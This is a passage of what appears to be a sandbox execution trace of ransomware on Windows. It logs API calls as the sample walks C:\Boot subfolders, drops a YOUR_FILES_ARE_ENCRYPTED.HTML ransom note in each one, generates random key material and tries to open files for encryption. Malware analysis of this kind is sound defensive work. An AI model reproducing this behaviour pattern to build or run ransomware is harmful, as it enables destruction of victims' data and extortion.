lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT\\*") returned="\\\\?\\C:\\Boot\\pt-PT\\*" [0104.653] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0104.653] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.653] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.653] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.653] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0104.653] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.653] lstrlenW (lpString=".mui") returned 4 [0104.653] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.653] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.653] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.653] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui") returned 33 [0104.653] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.653] lstrlenW (lpString=".mui") returned 4 [0104.653] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.654] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.654] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0104.654] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.654] GetProcessHeap () returned 0x600000 [0104.654] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.654] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\pt-pt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.655] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.656] CloseHandle (hObject=0x300) returned 1 [0104.657] GetProcessHeap () returned 0x600000 [0104.657] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.657] GetProcessHeap () returned 0x600000 [0104.657] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.657] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0104.657] StrStrIW (lpFirst="qps-ploc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.657] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\qps-ploc") returned 20 [0104.657] GetProcessHeap () returned 0x600000 [0104.657] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.658] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\qps-ploc" | out: lpString1="\\\\?\\C:\\Boot\\qps-ploc") returned="\\\\?\\C:\\Boot\\qps-ploc" [0104.658] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\qps-ploc", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\qps-ploc\\*") returned="\\\\?\\C:\\Boot\\qps-ploc\\*" [0104.658] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626838 [0104.659] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.659] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.659] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.659] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui") returned 36 [0104.659] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.659] lstrlenW (lpString=".mui") returned 4 [0104.659] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.659] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.659] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.659] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui") returned 36 [0104.659] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.659] lstrlenW (lpString=".mui") returned 4 [0104.659] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.659] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.659] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0104.659] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\qps-ploc\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 50 [0104.659] GetProcessHeap () returned 0x600000 [0104.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.659] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\qps-ploc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.661] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.662] CloseHandle (hObject=0x300) returned 1 [0104.662] GetProcessHeap () returned 0x600000 [0104.662] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.662] GetProcessHeap () returned 0x600000 [0104.662] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.663] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0104.663] StrStrIW (lpFirst="Resources", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.663] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Resources") returned 21 [0104.663] GetProcessHeap () returned 0x600000 [0104.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.664] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\Resources" | out: lpString1="\\\\?\\C:\\Boot\\Resources") returned="\\\\?\\C:\\Boot\\Resources" [0104.664] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Resources", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\Resources\\*") returned="\\\\?\\C:\\Boot\\Resources\\*" [0104.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Resources\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0104.664] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.664] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootres.dll", cAlternateFileName="")) returned 1 [0104.664] StrStrIW (lpFirst="bootres.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.664] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\bootres.dll") returned 33 [0104.664] PathFindExtensionW (pszPath="bootres.dll") returned=".dll" [0104.664] lstrlenW (lpString=".dll") returned 4 [0104.665] PathFindExtensionW (pszPath="bootres.dll") returned=".dll" [0104.665] SystemFunction036 (in: RandomBuffer=0x19f0d0, RandomBufferLength=0x20 | out: RandomBuffer=0x19f0d0) returned 1 [0104.665] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0104.665] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="en-US", cAlternateFileName="")) returned 1 [0104.665] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.665] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\en-US") returned 27 [0104.665] GetProcessHeap () returned 0x600000 [0104.665] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x682358 [0104.666] lstrcpyW (in: lpString1=0x682358, lpString2="\\\\?\\C:\\Boot\\Resources\\en-US" | out: lpString1="\\\\?\\C:\\Boot\\Resources\\en-US") returned="\\\\?\\C:\\Boot\\Resources\\en-US" [0104.666] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Resources\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\Resources\\en-US\\*") returned="\\\\?\\C:\\Boot\\Resources\\en-US\\*" [0104.666] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0104.666] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0104.666] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x9ea99bcf, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 1 [0104.666] StrStrIW (lpFirst="bootres.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.666] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui") returned 43 [0104.666] PathFindExtensionW (pszPath="bootres.dll.mui") returned=".mui" [0104.666] lstrlenW (lpString=".mui") returned 4 [0104.666] PathFindExtensionW (pszPath="bootres.dll.mui") returned=".mui" [0104.666] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x9ea99bcf, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 0 [0104.666] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0104.666] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 57 [0104.666] GetProcessHeap () returned 0x600000 [0104.666] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x692360 [0104.666] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\resources\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0104.667] WriteFile (in: hFile=0x304, lpBuffer=0x692360*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x692360*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0104.667] CloseHandle (hObject=0x304) returned 1 [0104.668] GetProcessHeap () returned 0x600000 [0104.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x692360 | out: hHeap=0x600000) returned 1 [0104.668] GetProcessHeap () returned 0x600000 [0104.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x682358 | out: hHeap=0x600000) returned 1 [0104.668] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="en-US", cAlternateFileName="")) returned 0 [0104.668] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0104.669] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 51 [0104.669] GetProcessHeap () returned 0x600000 [0104.669] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.669] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\resources\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.669] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.670] CloseHandle (hObject=0x300) returned 1 [0104.670] GetProcessHeap () returned 0x600000 [0104.670] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.670] GetProcessHeap () returned 0x600000 [0104.671] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.671] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0104.671] StrStrIW (lpFirst="ro-RO", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.671] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ro-RO") returned 17 [0104.671] GetProcessHeap () returned 0x600000 [0104.671] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.673] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\ro-RO" | out: lpString1="\\\\?\\C:\\Boot\\ro-RO") returned="\\\\?\\C:\\Boot\\ro-RO" [0104.673] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ro-RO", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\ro-RO\\*") returned="\\\\?\\C:\\Boot\\ro-RO\\*" [0104.673] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ro-RO\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626638 [0104.673] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.673] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.673] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.673] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 33 [0104.673] PathFindExtensionW 